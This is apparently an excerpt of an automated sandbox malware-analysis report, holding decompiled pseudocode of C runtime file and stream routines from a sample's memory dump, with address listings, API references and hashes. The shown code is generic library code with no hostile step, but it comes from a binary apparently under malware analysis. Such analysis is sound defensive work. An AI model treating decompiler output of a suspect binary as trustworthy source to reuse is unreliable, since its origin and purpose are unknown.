                                                                                                                                                                                                    														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                                                                                                                                                    														L37:
                                                                                                                                                                                                    														if(__eflags != 0) {
                                                                                                                                                                                                    															_t63 =  &_a4;
                                                                                                                                                                                                    															 *_t63 = _a4 + 1;
                                                                                                                                                                                                    															__eflags =  *_t63;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L39;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t94 =  *(_t104 + 0xc);
                                                                                                                                                                                                    													__eflags = _t94 & 0x00000008;
                                                                                                                                                                                                    													if((_t94 & 0x00000008) == 0) {
                                                                                                                                                                                                    														goto L35;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													__eflags = _t94 & 0x00000400;
                                                                                                                                                                                                    													if((_t94 & 0x00000400) == 0) {
                                                                                                                                                                                                    														goto L36;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													goto L35;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												L31:
                                                                                                                                                                                                    												_t75 = _t81 | 0xffffffff;
                                                                                                                                                                                                    												goto L41;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t84 =  *(_t104 + 8);
                                                                                                                                                                                                    											_t96 = _a4 + _t84;
                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                    												__eflags = _t84 - _t96;
                                                                                                                                                                                                    												if(_t84 >= _t96) {
                                                                                                                                                                                                    													break;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												__eflags =  *_t84 - 0xa;
                                                                                                                                                                                                    												if( *_t84 == 0xa) {
                                                                                                                                                                                                    													_t44 =  &_a4;
                                                                                                                                                                                                    													 *_t44 = _a4 + 1;
                                                                                                                                                                                                    													__eflags =  *_t44;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t84 = _t84 + 1;
                                                                                                                                                                                                    												__eflags = _t84;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                                                                                                                                                    											goto L37;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_v16 = _t87;
                                                                                                                                                                                                    										goto L40;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t75 = _v16;
                                                                                                                                                                                                    									goto L41;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t81 = E0040BFC1(__eflags);
                                                                                                                                                                                                    								 *_t81 = 0x16;
                                                                                                                                                                                                    								goto L31;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                                                                                                                                                    							_t114 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                    							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                                                                                                                                                    							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                                                                                                                                                    								goto L15;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t103 = _t92;
                                                                                                                                                                                                    							__eflags = _t103 - _t73;
                                                                                                                                                                                                    							if(_t103 >= _t73) {
                                                                                                                                                                                                    								goto L15;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t115 = _t73;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								__eflags =  *_t103 - 0xa;
                                                                                                                                                                                                    								if( *_t103 == 0xa) {
                                                                                                                                                                                                    									_v16 = _v16 + 1;
                                                                                                                                                                                                    									_t87 = 0;
                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t103 = _t103 + 1;
                                                                                                                                                                                                    								__eflags = _t103 - _t115;
                                                                                                                                                                                                    							} while (_t103 < _t115);
                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						return _t71 -  *(_t104 + 4);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t86 = E0040BFC1(_t121);
                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                    				 *_t86 = 0x16;
                                                                                                                                                                                                    				_t71 = E0040E744(__edx, _t104, __esi);
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}






























                                                                                                                                                                                                    0x0040c748
                                                                                                                                                                                                    0x0040c748
                                                                                                                                                                                                    0x0040c752
                                                                                                                                                                                                    0x0040c755
                                                                                                                                                                                                    0x0040c757
                                                                                                                                                                                                    0x0040c759
                                                                                                                                                                                                    0x0040c77c
                                                                                                                                                                                                    0x0040c781
                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                    0x0040c788
                                                                                                                                                                                                    0x0040c78a
                                                                                                                                                                                                    0x0040c78a
                                                                                                                                                                                                    0x0040c78d
                                                                                                                                                                                                    0x0040c78f
                                                                                                                                                                                                    0x0040c790
                                                                                                                                                                                                    0x0040c791
                                                                                                                                                                                                    0x0040c799
                                                                                                                                                                                                    0x0040c79b
                                                                                                                                                                                                    0x0040c79e
                                                                                                                                                                                                    0x0040c773
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7a0
                                                                                                                                                                                                    0x0040c7a0
                                                                                                                                                                                                    0x0040c7a3
                                                                                                                                                                                                    0x0040c7a9
                                                                                                                                                                                                    0x0040c7b3
                                                                                                                                                                                                    0x0040c7b5
                                                                                                                                                                                                    0x0040c7b8
                                                                                                                                                                                                    0x0040c7bd
                                                                                                                                                                                                    0x0040c7c0
                                                                                                                                                                                                    0x0040c7c3
                                                                                                                                                                                                    0x0040c806
                                                                                                                                                                                                    0x0040c808
                                                                                                                                                                                                    0x0040c7f9
                                                                                                                                                                                                    0x0040c7f9
                                                                                                                                                                                                    0x0040c7fc
                                                                                                                                                                                                    0x0040c81a
                                                                                                                                                                                                    0x0040c81e
                                                                                                                                                                                                    0x0040c8d8
                                                                                                                                                                                                    0x0040c8de
                                                                                                                                                                                                    0x0040c8de
                                                                                                                                                                                                    0x0040c8e0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c8e0
                                                                                                                                                                                                    0x0040c824
                                                                                                                                                                                                    0x0040c827
                                                                                                                                                                                                    0x0040c829
                                                                                                                                                                                                    0x0040c843
                                                                                                                                                                                                    0x0040c84a
                                                                                                                                                                                                    0x0040c84f
                                                                                                                                                                                                    0x0040c852
                                                                                                                                                                                                    0x0040c857
                                                                                                                                                                                                    0x0040c8d2
                                                                                                                                                                                                    0x0040c8d5
                                                                                                                                                                                                    0x0040c8d5
                                                                                                                                                                                                    0x0040c8d5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c8d5
                                                                                                                                                                                                    0x0040c859
                                                                                                                                                                                                    0x0040c85b
                                                                                                                                                                                                    0x0040c85d
                                                                                                                                                                                                    0x0040c868
                                                                                                                                                                                                    0x0040c86b
                                                                                                                                                                                                    0x0040c88d
                                                                                                                                                                                                    0x0040c88f
                                                                                                                                                                                                    0x0040c892
                                                                                                                                                                                                    0x0040c895
                                                                                                                                                                                                    0x0040c89d
                                                                                                                                                                                                    0x0040c89f
                                                                                                                                                                                                    0x0040c8a6
                                                                                                                                                                                                    0x0040c8ab
                                                                                                                                                                                                    0x0040c8ae
                                                                                                                                                                                                    0x0040c8c0
                                                                                                                                                                                                    0x0040c8c0
                                                                                                                                                                                                    0x0040c8c3
                                                                                                                                                                                                    0x0040c8c3
                                                                                                                                                                                                    0x0040c8c8
                                                                                                                                                                                                    0x0040c8cd
                                                                                                                                                                                                    0x0040c8cd
                                                                                                                                                                                                    0x0040c8cf
                                                                                                                                                                                                    0x0040c8cf
                                                                                                                                                                                                    0x0040c8cf
                                                                                                                                                                                                    0x0040c8cf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c8cd
                                                                                                                                                                                                    0x0040c8b0
                                                                                                                                                                                                    0x0040c8b3
                                                                                                                                                                                                    0x0040c8b6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c8b8
                                                                                                                                                                                                    0x0040c8be
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c8be
                                                                                                                                                                                                    0x0040c8a1
                                                                                                                                                                                                    0x0040c8a1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c8a1
                                                                                                                                                                                                    0x0040c86d
                                                                                                                                                                                                    0x0040c873
                                                                                                                                                                                                    0x0040c880
                                                                                                                                                                                                    0x0040c880
                                                                                                                                                                                                    0x0040c882
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c877
                                                                                                                                                                                                    0x0040c87a
                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                    0x0040c87f
                                                                                                                                                                                                    0x0040c87f
                                                                                                                                                                                                    0x0040c87f
                                                                                                                                                                                                    0x0040c884
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c884
                                                                                                                                                                                                    0x0040c82b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c82b
                                                                                                                                                                                                    0x0040c7fe
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7fe
                                                                                                                                                                                                    0x0040c80a
                                                                                                                                                                                                    0x0040c80f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c80f
                                                                                                                                                                                                    0x0040c7ce
                                                                                                                                                                                                    0x0040c7d8
                                                                                                                                                                                                    0x0040c7db
                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7e2
                                                                                                                                                                                                    0x0040c7e4
                                                                                                                                                                                                    0x0040c7e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7e8
                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                    0x0040c7ed
                                                                                                                                                                                                    0x0040c7ef
                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                    0x0040c7f4
                                                                                                                                                                                                    0x0040c7f5
                                                                                                                                                                                                    0x0040c7f5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7ab
                                                                                                                                                                                                    0x0040c79e
                                                                                                                                                                                                    0x0040c75b
                                                                                                                                                                                                    0x0040c760
                                                                                                                                                                                                    0x0040c761
                                                                                                                                                                                                    0x0040c762
                                                                                                                                                                                                    0x0040c763
                                                                                                                                                                                                    0x0040c764
                                                                                                                                                                                                    0x0040c765
                                                                                                                                                                                                    0x0040c76b
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                    • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2395185920-0
                                                                                                                                                                                                    • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                    • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                                                    			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t30;
                                                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                    				signed int* _t53;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t54 = __ebp;
                                                                                                                                                                                                    				_t45 = __edx;
                                                                                                                                                                                                    				_t42 = __ebx;
                                                                                                                                                                                                    				_t53 = _a4;
                                                                                                                                                                                                    				if(_t53 == 0) {
                                                                                                                                                                                                    					L40:
                                                                                                                                                                                                    					_t31 = _t30 | 0xffffffff;
                                                                                                                                                                                                    					__eflags = _t31;
                                                                                                                                                                                                    					return _t31;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t43 = _a12;
                                                                                                                                                                                                    					if(_t43 == 2) {
                                                                                                                                                                                                    						goto L40;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t30 = _t53[0xe];
                                                                                                                                                                                                    						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                                                                                                                    							goto L40;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t48 = _a8;
                                                                                                                                                                                                    							if(_t53[0x17] != 0x77) {
                                                                                                                                                                                                    								__eflags = _t43 - 1;
                                                                                                                                                                                                    								if(_t43 == 1) {
                                                                                                                                                                                                    									_t48 = _t48 + _t53[0x1a];
                                                                                                                                                                                                    									__eflags = _t48;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = _t48;
                                                                                                                                                                                                    								if(_t48 < 0) {
                                                                                                                                                                                                    									goto L39;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									__eflags = _t53[0x16];
                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                    										_t33 = _t53[0x1a];
                                                                                                                                                                                                    										__eflags = _t48 - _t33;
                                                                                                                                                                                                    										if(_t48 < _t33) {
                                                                                                                                                                                                    											_t30 = E004054F0(_t42, _t54, _t53);
                                                                                                                                                                                                    											_t55 = _t55 + 4;
                                                                                                                                                                                                    											__eflags = _t30;
                                                                                                                                                                                                    											if(_t30 < 0) {
                                                                                                                                                                                                    												goto L39;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												goto L27;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t48 = _t48 - _t33;
                                                                                                                                                                                                    											L27:
                                                                                                                                                                                                    											__eflags = _t48;
                                                                                                                                                                                                    											if(_t48 == 0) {
                                                                                                                                                                                                    												L38:
                                                                                                                                                                                                    												return _t53[0x1a];
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												__eflags = _t53[0x12];
                                                                                                                                                                                                    												if(_t53[0x12] != 0) {
                                                                                                                                                                                                    													L30:
                                                                                                                                                                                                    													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                                                                                                    													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                                                                                                    														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                                                                                                    														_t48 = _t48 - 1;
                                                                                                                                                                                                    														__eflags = _t53[0x1c];
                                                                                                                                                                                                    														_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                    														if(_t53[0x1c] != 0) {
                                                                                                                                                                                                    															_t53[0xe] = 1;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													__eflags = _t48;
                                                                                                                                                                                                    													if(_t48 <= 0) {
                                                                                                                                                                                                    														goto L38;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														while(1) {
                                                                                                                                                                                                    															_t35 = 0x4000;
                                                                                                                                                                                                    															__eflags = _t48 - 0x4000;
                                                                                                                                                                                                    															if(_t48 < 0x4000) {
                                                                                                                                                                                                    																_t35 = _t48;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                                                                                                                                                    															_t55 = _t55 + 0xc;
                                                                                                                                                                                                    															__eflags = _t30;
                                                                                                                                                                                                    															if(_t30 <= 0) {
                                                                                                                                                                                                    																goto L39;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															_t48 = _t48 - _t30;
                                                                                                                                                                                                    															__eflags = _t48;
                                                                                                                                                                                                    															if(_t48 > 0) {
                                                                                                                                                                                                    																continue;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																goto L38;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															goto L41;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L39;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                    													_t55 = _t55 + 4;
                                                                                                                                                                                                    													_t53[0x12] = _t30;
                                                                                                                                                                                                    													__eflags = _t30;
                                                                                                                                                                                                    													if(_t30 == 0) {
                                                                                                                                                                                                    														goto L39;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_push(0);
                                                                                                                                                                                                    										_push(_t48);
                                                                                                                                                                                                    										_push(_t53[0x10]);
                                                                                                                                                                                                    										_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                    										_t53[1] = 0;
                                                                                                                                                                                                    										 *_t53 = _t53[0x11];
                                                                                                                                                                                                    										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                    										if(_t30 < 0) {
                                                                                                                                                                                                    											goto L39;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t53[0x1a] = _t48;
                                                                                                                                                                                                    											_t53[0x19] = _t48;
                                                                                                                                                                                                    											return _t48;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								if(_t43 == 0) {
                                                                                                                                                                                                    									_t48 = _t48 - _t53[0x19];
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(_t48 < 0) {
                                                                                                                                                                                                    									L39:
                                                                                                                                                                                                    									_t32 = _t30 | 0xffffffff;
                                                                                                                                                                                                    									__eflags = _t32;
                                                                                                                                                                                                    									return _t32;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(_t53[0x11] != 0) {
                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                    										if(_t48 <= 0) {
                                                                                                                                                                                                    											L17:
                                                                                                                                                                                                    											return _t53[0x19];
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                    												_t39 = 0x4000;
                                                                                                                                                                                                    												if(_t48 < 0x4000) {
                                                                                                                                                                                                    													_t39 = _t48;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                                                                                                    												_t55 = _t55 + 0xc;
                                                                                                                                                                                                    												if(_t30 == 0) {
                                                                                                                                                                                                    													goto L39;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t48 = _t48 - _t30;
                                                                                                                                                                                                    												if(_t48 > 0) {
                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													goto L17;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L41;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											goto L39;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                    										_t57 = _t55 + 4;
                                                                                                                                                                                                    										_t53[0x11] = _t30;
                                                                                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                                                                                    											goto L39;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                                                                                                                                                    											_t55 = _t57 + 0xc;
                                                                                                                                                                                                    											goto L11;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L41:
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x00405d00
                                                                                                                                                                                                    0x00405d00
                                                                                                                                                                                                    0x00405d00
                                                                                                                                                                                                    0x00405d01
                                                                                                                                                                                                    0x00405d07
                                                                                                                                                                                                    0x00405e7f
                                                                                                                                                                                                    0x00405e7f
                                                                                                                                                                                                    0x00405e7f
                                                                                                                                                                                                    0x00405e83
                                                                                                                                                                                                    0x00405d0d
                                                                                                                                                                                                    0x00405d0d
                                                                                                                                                                                                    0x00405d14
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405d1a
                                                                                                                                                                                                    0x00405d1a
                                                                                                                                                                                                    0x00405d20
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405d2f
                                                                                                                                                                                                    0x00405d34
                                                                                                                                                                                                    0x00405d38
                                                                                                                                                                                                    0x00405dad
                                                                                                                                                                                                    0x00405db0
                                                                                                                                                                                                    0x00405db2
                                                                                                                                                                                                    0x00405db2
                                                                                                                                                                                                    0x00405db2
                                                                                                                                                                                                    0x00405db5
                                                                                                                                                                                                    0x00405db7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405dbd
                                                                                                                                                                                                    0x00405dbd
                                                                                                                                                                                                    0x00405dc1
                                                                                                                                                                                                    0x00405df8
                                                                                                                                                                                                    0x00405dfb
                                                                                                                                                                                                    0x00405dfd
                                                                                                                                                                                                    0x00405e04
                                                                                                                                                                                                    0x00405e09
                                                                                                                                                                                                    0x00405e0c
                                                                                                                                                                                                    0x00405e0e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405dff
                                                                                                                                                                                                    0x00405dff
                                                                                                                                                                                                    0x00405e10
                                                                                                                                                                                                    0x00405e10
                                                                                                                                                                                                    0x00405e12
                                                                                                                                                                                                    0x00405e73
                                                                                                                                                                                                    0x00405e78
                                                                                                                                                                                                    0x00405e14
                                                                                                                                                                                                    0x00405e14
                                                                                                                                                                                                    0x00405e18
                                                                                                                                                                                                    0x00405e2e
                                                                                                                                                                                                    0x00405e2e
                                                                                                                                                                                                    0x00405e32
                                                                                                                                                                                                    0x00405e34
                                                                                                                                                                                                    0x00405e37
                                                                                                                                                                                                    0x00405e38
                                                                                                                                                                                                    0x00405e3c
                                                                                                                                                                                                    0x00405e43
                                                                                                                                                                                                    0x00405e45
                                                                                                                                                                                                    0x00405e45
                                                                                                                                                                                                    0x00405e43
                                                                                                                                                                                                    0x00405e4c
                                                                                                                                                                                                    0x00405e4e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405e50
                                                                                                                                                                                                    0x00405e50
                                                                                                                                                                                                    0x00405e50
                                                                                                                                                                                                    0x00405e55
                                                                                                                                                                                                    0x00405e57
                                                                                                                                                                                                    0x00405e59
                                                                                                                                                                                                    0x00405e59
                                                                                                                                                                                                    0x00405e61
                                                                                                                                                                                                    0x00405e66
                                                                                                                                                                                                    0x00405e69
                                                                                                                                                                                                    0x00405e6b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405e6d
                                                                                                                                                                                                    0x00405e6f
                                                                                                                                                                                                    0x00405e71
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405e71
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405e50
                                                                                                                                                                                                    0x00405e1a
                                                                                                                                                                                                    0x00405e1f
                                                                                                                                                                                                    0x00405e24
                                                                                                                                                                                                    0x00405e27
                                                                                                                                                                                                    0x00405e2a
                                                                                                                                                                                                    0x00405e2c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405e2c
                                                                                                                                                                                                    0x00405e18
                                                                                                                                                                                                    0x00405e12
                                                                                                                                                                                                    0x00405dc3
                                                                                                                                                                                                    0x00405dc9
                                                                                                                                                                                                    0x00405dcb
                                                                                                                                                                                                    0x00405dcc
                                                                                                                                                                                                    0x00405dcd
                                                                                                                                                                                                    0x00405dd4
                                                                                                                                                                                                    0x00405ddb
                                                                                                                                                                                                    0x00405ddd
                                                                                                                                                                                                    0x00405de5
                                                                                                                                                                                                    0x00405de7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405ded
                                                                                                                                                                                                    0x00405ded
                                                                                                                                                                                                    0x00405df0
                                                                                                                                                                                                    0x00405df7
                                                                                                                                                                                                    0x00405df7
                                                                                                                                                                                                    0x00405de7
                                                                                                                                                                                                    0x00405dc1
                                                                                                                                                                                                    0x00405d3a
                                                                                                                                                                                                    0x00405d3c
                                                                                                                                                                                                    0x00405d3e
                                                                                                                                                                                                    0x00405d3e
                                                                                                                                                                                                    0x00405d43
                                                                                                                                                                                                    0x00405e79
                                                                                                                                                                                                    0x00405e7a
                                                                                                                                                                                                    0x00405e7a
                                                                                                                                                                                                    0x00405e7e
                                                                                                                                                                                                    0x00405d49
                                                                                                                                                                                                    0x00405d4d
                                                                                                                                                                                                    0x00405d77
                                                                                                                                                                                                    0x00405d79
                                                                                                                                                                                                    0x00405da7
                                                                                                                                                                                                    0x00405dac
                                                                                                                                                                                                    0x00405d7b
                                                                                                                                                                                                    0x00405d80
                                                                                                                                                                                                    0x00405d80
                                                                                                                                                                                                    0x00405d87
                                                                                                                                                                                                    0x00405d89
                                                                                                                                                                                                    0x00405d89
                                                                                                                                                                                                    0x00405d91
                                                                                                                                                                                                    0x00405d96
                                                                                                                                                                                                    0x00405d9b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405da1
                                                                                                                                                                                                    0x00405da5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405da5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405d80
                                                                                                                                                                                                    0x00405d4f
                                                                                                                                                                                                    0x00405d54
                                                                                                                                                                                                    0x00405d59
                                                                                                                                                                                                    0x00405d5c
                                                                                                                                                                                                    0x00405d61
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405d67
                                                                                                                                                                                                    0x00405d6f
                                                                                                                                                                                                    0x00405d74
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405d74
                                                                                                                                                                                                    0x00405d61
                                                                                                                                                                                                    0x00405d4d
                                                                                                                                                                                                    0x00405d43
                                                                                                                                                                                                    0x00405d38
                                                                                                                                                                                                    0x00405d20
                                                                                                                                                                                                    0x00405d14
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
